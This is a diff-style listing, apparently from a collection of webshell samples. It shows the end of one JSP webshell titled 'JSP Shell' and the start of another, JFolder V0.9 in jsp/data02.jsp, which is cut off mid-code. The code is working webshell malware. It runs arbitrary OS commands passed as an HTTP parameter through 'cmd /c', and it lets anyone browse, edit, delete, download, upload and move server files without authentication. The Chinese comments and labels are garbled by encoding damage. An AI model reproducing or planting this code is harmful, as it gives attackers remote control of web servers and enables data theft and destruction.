function collecttablinks(){
|
||||
var tabobj=document.getElementById("tablist")
|
||||
tabobjlinks=tabobj.getElementsByTagName("A")
|
||||
}
|
||||
|
||||
function do_onload(){
|
||||
collecttablinks()
|
||||
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
|
||||
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
|
||||
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
|
||||
}
|
||||
|
||||
if (window.addEventListener)
|
||||
window.addEventListener("load", do_onload, false)
|
||||
else if (window.attachEvent)
|
||||
window.attachEvent("onload", do_onload)
|
||||
else if (document.getElementById)
|
||||
window.onload=do_onload
|
||||
|
||||
|
||||
|
||||
</script>
|
||||
<script language="javascript">
|
||||
|
||||
function doForm(action,path,file,cmd,tab,content)
|
||||
{
|
||||
document.frmCqq.action.value=action;
|
||||
document.frmCqq.path.value=path;
|
||||
document.frmCqq.file.value=file;
|
||||
document.frmCqq.cmd.value=cmd;
|
||||
document.frmCqq.tabID.value=tab;
|
||||
document.frmCqq.content.value=content;
|
||||
if(action=="del")
|
||||
{
|
||||
if(confirm("?·?¨?????????? "+file+" ????"))
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
else
|
||||
{
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
|
||||
<title>JSP Shell ·?°??????ú</title>
|
||||
<head>
|
||||
|
||||
|
||||
<body>
|
||||
|
||||
<form name="frmCqq" method="post" action="">
|
||||
<input type="hidden" name="action" value="">
|
||||
<input type="hidden" name="path" value="">
|
||||
<input type="hidden" name="file" value="">
|
||||
<input type="hidden" name="cmd" value="">
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type="hidden" name="content" value="">
|
||||
</form>
|
||||
|
||||
<!--Top Menu Started-->
|
||||
<ul id="tablist">
|
||||
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
|
||||
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
|
||||
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
|
||||
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
|
||||
<%=authorInfo[languageNo]%>
|
||||
</ul>
|
||||
<!--Top Menu End-->
|
||||
|
||||
|
||||
<%
|
||||
StringBuffer sbFolder=new StringBuffer("");
|
||||
StringBuffer sbFile=new StringBuffer("");
|
||||
try
|
||||
{
|
||||
File objFile = new File(strDir);
|
||||
File list[] = objFile.listFiles();
|
||||
if(objFile.getAbsolutePath().length()>3)
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
|
||||
|
||||
|
||||
}
|
||||
for(int i=0;i<list.length;i++)
|
||||
{
|
||||
if(list[i].isDirectory())
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td>");
|
||||
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strLen="";
|
||||
String strDT="";
|
||||
long lFile=0;
|
||||
lFile=list[i].length();
|
||||
strLen = convertFileSize(lFile);
|
||||
Date dt=new Date(list[i].lastModified());
|
||||
strDT=dt.toLocaleString();
|
||||
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
|
||||
sbFile.append(""+list[i].getName());
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strLen);
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strDT);
|
||||
sbFile.append("</td><td>");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileEdit[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDel[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDown[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileCopy[languageNo]+"</a> ");
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
|
||||
}
|
||||
%>
|
||||
|
||||
<DIV id="tabcontentcontainer">
|
||||
|
||||
|
||||
<div id="menu3" class="tabcontent">
|
||||
<br>
|
||||
<br> ???ê??
|
||||
<br>
|
||||
<br>
|
||||
|
||||
</div>
|
||||
|
||||
<div id="menu4" class="tabcontent">
|
||||
<br>
|
||||
<p>???????????÷</p>
|
||||
<p> jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
|
||||
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
|
||||
<p>??windows??cmd??</p>
|
||||
<p> </p>
|
||||
<p>????????</p>
|
||||
<p> <b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
|
||||
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
|
||||
<p> </p>
|
||||
<p>?????ü??????</p>
|
||||
<p> 2004.11.15 V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
|
||||
<p> 2004.10.27 ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
|
||||
<p> 2004.09.20 ??????jsp ???ò?????????ò???????????????????????ò</p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
</div>
|
||||
|
||||
|
||||
<div id="menu1" class="tabcontent">
|
||||
<%
|
||||
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
|
||||
%>
|
||||
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
|
||||
|
||||
<tr>
|
||||
<td width="25%" align="center" valign="top">
|
||||
<table width="98%" border="0" cellspacing="0" cellpadding="3">
|
||||
<%=sbFolder%>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="81%" align="left" valign="top">
|
||||
|
||||
<%
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
out.println(sbEdit.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
out.println(sbCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
out.println(sbDown.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
out.println(sbSaveCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
|
||||
{
|
||||
out.println(sbNewFile.toString());
|
||||
}
|
||||
else
|
||||
{
|
||||
%>
|
||||
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
|
||||
<tr bgcolor="#E7e7e6">
|
||||
<td width="26%"><%=strFileName[languageNo]%></td>
|
||||
<td width="19%"><%=strFileSize[languageNo]%></td>
|
||||
<td width="29%"><%=strLastModified[languageNo]%></td>
|
||||
<td width="26%"><%=strFileOperation[languageNo]%></td>
|
||||
</tr>
|
||||
<%=sbFile%>
|
||||
<!-- <tr align="center">
|
||||
<td colspan="4"><br>
|
||||
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
|
||||
KB </td>
|
||||
</tr>
|
||||
-->
|
||||
</table>
|
||||
</span>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<form name="frmMake" action="" method="post">
|
||||
<tr><td colspan=2 bgcolor=#FBFFC6>
|
||||
<input type="hidden" name="action" value="newFile">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<%
|
||||
if(!strDir.endsWith("\\"))
|
||||
strDir = strDir + "\\";
|
||||
%>
|
||||
<input type="text" name="fileName" size=36 value="<%=strDir%>">
|
||||
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
|
||||
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
|
||||
</form>
|
||||
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
|
||||
<input type="hidden" name="action" value="upload">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<input type="file" name="cqqUploadFile" size="36">
|
||||
<input type="submit" name="submit" value="????">
|
||||
</td></tr></form>
|
||||
</table>
|
||||
</div>
|
||||
<div id="menu2" class="tabcontent">
|
||||
|
||||
<%
|
||||
String line="";
|
||||
StringBuffer sbCmd=new StringBuffer("");
|
||||
|
||||
if(strCmd!=null)
|
||||
{
|
||||
try
|
||||
{
|
||||
//out.println(strCmd);
|
||||
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbCmd.append(line+"\r\n");
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
System.out.println(e.toString());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
strCmd = "set";
|
||||
}
|
||||
|
||||
%>
|
||||
<form name="cmd" action="" method="post">
|
||||
|
||||
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
|
||||
</form>
|
||||
<%
|
||||
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
|
||||
{
|
||||
%>
|
||||
<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
|
||||
<br>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
</DIV>
|
||||
</div>
|
||||
<br><br>
|
||||
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
|
||||
<br>Email:121208099#qq.com
|
993
jsp/data02.jsp
Normal file
|
@ -0,0 +1,993 @@
|
|||
<%
|
||||
/**
|
||||
JFolder V0.9 windows platform
|
||||
@Filename?? JFolder.jsp
|
||||
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
|
||||
|
||||
@Bugs : ?????±??????????????·¨????????
|
||||
*/
|
||||
%>
|
||||
<%@ page contentType="text/html;charset=gb2312"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*" %>
|
||||
<%!
|
||||
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
|
||||
String strThisFile="JFolder.jsp";
|
||||
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
|
||||
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
|
||||
String[] strCommand = {"CMD ?ü ??","Command Window"};
|
||||
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
|
||||
String[] strHelp = {"°? ?ú","Help"};
|
||||
String[] strParentFolder = {"????????","Parent Folder"};
|
||||
String[] strCurrentFolder= {"?±?°????","Current Folder"};
|
||||
String[] strDrivers = {"?????÷","Drivers"};
|
||||
String[] strFileName = {"????????","File Name"};
|
||||
String[] strFileSize = {"?????ó??","File Size"};
|
||||
String[] strLastModified = {"×??ó????","Last Modified"};
|
||||
String[] strFileOperation= {"??????×÷","Operations"};
|
||||
String[] strFileEdit = {"????","Edit"};
|
||||
String[] strFileDown = {"????","Download"};
|
||||
String[] strFileCopy = {"????","Move"};
|
||||
String[] strFileDel = {"????","Delete"};
|
||||
String[] strExecute = {"????","Execute"};
|
||||
String[] strBack = {"·???","Back"};
|
||||
String[] strFileSave = {"±???","Save"};
|
||||
|
||||
public class FileHandler
|
||||
{
|
||||
private String strAction="";
|
||||
private String strFile="";
|
||||
void FileHandler(String action,String f)
|
||||
{
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
public static class UploadMonitor {
|
||||
|
||||
static Hashtable uploadTable = new Hashtable();
|
||||
|
||||
static void set(String fName, UplInfo info) {
|
||||
uploadTable.put(fName, info);
|
||||
}
|
||||
|
||||
static void remove(String fName) {
|
||||
uploadTable.remove(fName);
|
||||
}
|
||||
|
||||
static UplInfo getInfo(String fName) {
|
||||
UplInfo info = (UplInfo) uploadTable.get(fName);
|
||||
return info;
|
||||
}
|
||||
}
|
||||
|
||||
public class UplInfo {
|
||||
|
||||
public long totalSize;
|
||||
public long currSize;
|
||||
public long starttime;
|
||||
public boolean aborted;
|
||||
|
||||
public UplInfo() {
|
||||
totalSize = 0l;
|
||||
currSize = 0l;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public UplInfo(int size) {
|
||||
totalSize = size;
|
||||
currSize = 0;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public String getUprate() {
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
if (time != 0) {
|
||||
long uprate = currSize * 1000 / time;
|
||||
return convertFileSize(uprate) + "/s";
|
||||
}
|
||||
else return "n/a";
|
||||
}
|
||||
|
||||
public int getPercent() {
|
||||
if (totalSize == 0) return 0;
|
||||
else return (int) (currSize * 100 / totalSize);
|
||||
}
|
||||
|
||||
public String getTimeElapsed() {
|
||||
long time = (System.currentTimeMillis() - starttime) / 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
public String getTimeEstimated() {
|
||||
if (currSize == 0) return "n/a";
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
time = totalSize * time / currSize;
|
||||
time /= 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public class FileInfo {
|
||||
|
||||
public String name = null, clientFileName = null, fileContentType = null;
|
||||
private byte[] fileContents = null;
|
||||
public File file = null;
|
||||
public StringBuffer sb = new StringBuffer(100);
|
||||
|
||||
public void setFileContents(byte[] aByteArray) {
|
||||
fileContents = new byte[aByteArray.length];
|
||||
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
|
||||
}
|
||||
}
|
||||
|
||||
// A Class with methods used to process a ServletInputStream
|
||||
public class HttpMultiPartParser {
|
||||
|
||||
private final String lineSeparator = System.getProperty("line.separator", "\n");
|
||||
private final int ONE_MB = 1024 * 1;
|
||||
|
||||
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
|
||||
int clength) throws IllegalArgumentException, IOException {
|
||||
if (is == null) throw new IllegalArgumentException("InputStream");
|
||||
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
|
||||
"\"" + boundary + "\" is an illegal boundary indicator");
|
||||
boundary = "--" + boundary;
|
||||
StringTokenizer stLine = null, stFields = null;
|
||||
FileInfo fileInfo = null;
|
||||
Hashtable dataTable = new Hashtable(5);
|
||||
String line = null, field = null, paramName = null;
|
||||
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
|
||||
boolean isFile = false;
|
||||
if (saveFiles) { // Create the required directory (including parent dirs)
|
||||
File f = new File(saveInDir);
|
||||
f.mkdirs();
|
||||
}
|
||||
line = getLine(is);
|
||||
if (line == null || !line.startsWith(boundary)) throw new IOException(
|
||||
"Boundary not found; boundary = " + boundary + ", line = " + line);
|
||||
while (line != null) {
|
||||
if (line == null || !line.startsWith(boundary)) return dataTable;
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
stLine = new StringTokenizer(line, ";\r\n");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
line = stLine.nextToken().toLowerCase();
|
||||
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
|
||||
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
fileInfo = new FileInfo();
|
||||
stFields.nextToken();
|
||||
paramName = stFields.nextToken();
|
||||
isFile = false;
|
||||
if (stLine.hasMoreTokens()) {
|
||||
field = stLine.nextToken();
|
||||
stFields = new StringTokenizer(field, "=\"");
|
||||
if (stFields.countTokens() > 1) {
|
||||
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
|
||||
fileInfo.name = paramName;
|
||||
String value = stFields.nextToken();
|
||||
if (value != null && value.trim().length() > 0) {
|
||||
fileInfo.clientFileName = value;
|
||||
isFile = true;
|
||||
}
|
||||
else {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
else if (field.toLowerCase().indexOf("filename") >= 0) {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
boolean skipBlankLine = true;
|
||||
if (isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
if (line.trim().length() < 1) skipBlankLine = false;
|
||||
else {
|
||||
stLine = new StringTokenizer(line, ": ");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in third line");
|
||||
stLine.nextToken(); // Content-Type
|
||||
fileInfo.fileContentType = stLine.nextToken();
|
||||
}
|
||||
}
|
||||
if (skipBlankLine) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
}
|
||||
if (!isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
dataTable.put(paramName, line);
|
||||
// If parameter is dir, change saveInDir to dir
|
||||
if (paramName.equals("dir")) saveInDir = line;
|
||||
line = getLine(is);
|
||||
continue;
|
||||
}
|
||||
try {
|
||||
UplInfo uplInfo = new UplInfo(clength);
|
||||
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
|
||||
OutputStream os = null;
|
||||
String path = null;
|
||||
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
|
||||
fileInfo.clientFileName));
|
||||
else os = new ByteArrayOutputStream(ONE_MB);
|
||||
boolean readingContent = true;
|
||||
byte previousLine[] = new byte[2 * ONE_MB];
|
||||
byte temp[] = null;
|
||||
byte currentLine[] = new byte[2 * ONE_MB];
|
||||
int read, read3;
|
||||
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
|
||||
line = null;
|
||||
break;
|
||||
}
|
||||
while (readingContent) {
|
||||
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
|
||||
line = null;
|
||||
uplInfo.aborted = true;
|
||||
break;
|
||||
}
|
||||
if (compareBoundary(boundary, currentLine)) {
|
||||
os.write(previousLine, 0, read - 2);
|
||||
line = new String(currentLine, 0, read3);
|
||||
break;
|
||||
}
|
||||
else {
|
||||
os.write(previousLine, 0, read);
|
||||
uplInfo.currSize += read;
|
||||
temp = currentLine;
|
||||
currentLine = previousLine;
|
||||
previousLine = temp;
|
||||
read = read3;
|
||||
}//end else
|
||||
}//end while
|
||||
os.flush();
|
||||
os.close();
|
||||
if (!saveFiles) {
|
||||
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
|
||||
fileInfo.setFileContents(baos.toByteArray());
|
||||
}
|
||||
else fileInfo.file = new File(path);
|
||||
dataTable.put(paramName, fileInfo);
|
||||
uplInfo.currSize = uplInfo.totalSize;
|
||||
}//end try
|
||||
catch (IOException e) {
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
return dataTable;
|
||||
}
|
||||
|
||||
/**
|
||||
* Compares boundary string to byte array
|
||||
*/
|
||||
private boolean compareBoundary(String boundary, byte ba[]) {
|
||||
byte b;
|
||||
if (boundary == null || ba == null) return false;
|
||||
for (int i = 0; i < boundary.length(); i++)
|
||||
if ((byte) boundary.charAt(i) != ba[i]) return false;
|
||||
return true;
|
||||
}
|
||||
|
||||
/** Convenience method to read HTTP header lines */
|
||||
private synchronized String getLine(ServletInputStream sis) throws IOException {
|
||||
byte b[] = new byte[1024];
|
||||
int read = sis.readLine(b, 0, b.length), index;
|
||||
String line = null;
|
||||
if (read != -1) {
|
||||
line = new String(b, 0, read);
|
||||
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
|
||||
}
|
||||
return line;
|
||||
}
|
||||
|
||||
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
|
||||
String path = null;
|
||||
if (dir == null || fileName == null) throw new IllegalArgumentException(
|
||||
"dir or fileName is null");
|
||||
int index = fileName.lastIndexOf('/');
|
||||
String name = null;
|
||||
if (index >= 0) name = fileName.substring(index + 1);
|
||||
else name = fileName;
|
||||
index = name.lastIndexOf('\\');
|
||||
if (index >= 0) fileName = name.substring(index + 1);
|
||||
path = dir + File.separator + fileName;
|
||||
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
|
||||
else return path.replace('/', File.separatorChar);
|
||||
}
|
||||
} //End of class HttpMultiPartParser
|
||||
|
||||
String formatPath(String p)
|
||||
{
|
||||
StringBuffer sb=new StringBuffer();
|
||||
for (int i = 0; i < p.length(); i++)
|
||||
{
|
||||
if(p.charAt(i)=='\\')
|
||||
{
|
||||
sb.append("\\\\");
|
||||
}
|
||||
else
|
||||
{
|
||||
sb.append(p.charAt(i));
|
||||
}
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts some important chars (int) to the corresponding html string
|
||||
*/
|
||||
static String conv2Html(int i) {
|
||||
if (i == '&') return "&";
|
||||
else if (i == '<') return "<";
|
||||
else if (i == '>') return ">";
|
||||
else if (i == '"') return """;
|
||||
else return "" + (char) i;
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts a normal string to a html conform string
|
||||
*/
|
||||
static String htmlEncode(String st) {
|
||||
StringBuffer buf = new StringBuffer();
|
||||
for (int i = 0; i < st.length(); i++) {
|
||||
buf.append(conv2Html(st.charAt(i)));
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
String getDrivers()
|
||||
/**
|
||||
Windows?????????????????ù????????
|
||||
*/
|
||||
{
|
||||
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
|
||||
File roots[]=File.listRoots();
|
||||
for(int i=0;i<roots.length;i++)
|
||||
{
|
||||
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
|
||||
sb.append(roots[i]+"</a> ");
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
static String convertFileSize(long filesize)
|
||||
{
|
||||
//bug 5.09M ????5.9M
|
||||
String strUnit="Bytes";
|
||||
String strAfterComma="";
|
||||
int intDivisor=1;
|
||||
if(filesize>=1024*1024)
|
||||
{
|
||||
strUnit = "MB";
|
||||
intDivisor=1024*1024;
|
||||
}
|
||||
else if(filesize>=1024)
|
||||
{
|
||||
strUnit = "KB";
|
||||
intDivisor=1024;
|
||||
}
|
||||
if(intDivisor==1) return filesize + " " + strUnit;
|
||||
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
|
||||
if(strAfterComma=="") strAfterComma=".0";
|
||||
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
request.setCharacterEncoding("gb2312");
|
||||
String tabID = request.getParameter("tabID");
|
||||
String strDir = request.getParameter("path");
|
||||
String strAction = request.getParameter("action");
|
||||
String strFile = request.getParameter("file");
|
||||
String strPath = strDir + "\\" + strFile;
|
||||
String strCmd = request.getParameter("cmd");
|
||||
StringBuffer sbEdit=new StringBuffer("");
|
||||
StringBuffer sbDown=new StringBuffer("");
|
||||
StringBuffer sbCopy=new StringBuffer("");
|
||||
StringBuffer sbSaveCopy=new StringBuffer("");
|
||||
StringBuffer sbNewFile=new StringBuffer("");
|
||||
|
||||
if((tabID==null) || tabID.equals(""))
|
||||
{
|
||||
tabID = "1";
|
||||
}
|
||||
|
||||
if(strDir==null||strDir.length()<1)
|
||||
{
|
||||
strDir = request.getRealPath("/");
|
||||
}
|
||||
|
||||
|
||||
if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
if(f.length()==0)
|
||||
{
|
||||
sbDown.append("?????ó???? 0 ×???????????????°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
response.setHeader("content-type","text/html; charset=ISO-8859-1");
|
||||
response.setContentType("APPLICATION/OCTET-STREAM");
|
||||
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
|
||||
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
|
||||
out.clearBuffer();
|
||||
int i;
|
||||
while ((i=fileInputStream.read()) != -1)
|
||||
{
|
||||
out.write(i);
|
||||
}
|
||||
fileInputStream.close();
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("del"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
f.delete();
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
|
||||
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
|
||||
sbEdit.append("<input type=hidden name=action value=save >\r\n");
|
||||
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
|
||||
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> "+strPath+"\r\n");
|
||||
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
|
||||
String line="";
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbEdit.append(htmlEncode(line)+"\r\n");
|
||||
}
|
||||
sbEdit.append("</textarea>");
|
||||
sbEdit.append("<input type=hidden name=path value="+strDir+">");
|
||||
sbEdit.append("</form>");
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("save"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
|
||||
String strContent=request.getParameter("content");
|
||||
bw.write(strContent);
|
||||
bw.close();
|
||||
}
|
||||
if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
|
||||
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
|
||||
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbCopy.append("?????????? "+strPath+"<p>");
|
||||
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
|
||||
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
|
||||
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p> \r\n");
|
||||
sbCopy.append("</form>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
String strDesFile=request.getParameter("file2");
|
||||
if(strDesFile==null || strDesFile.equals(""))
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
File f_des=new File(strDesFile);
|
||||
if(f_des.isFile())
|
||||
{
|
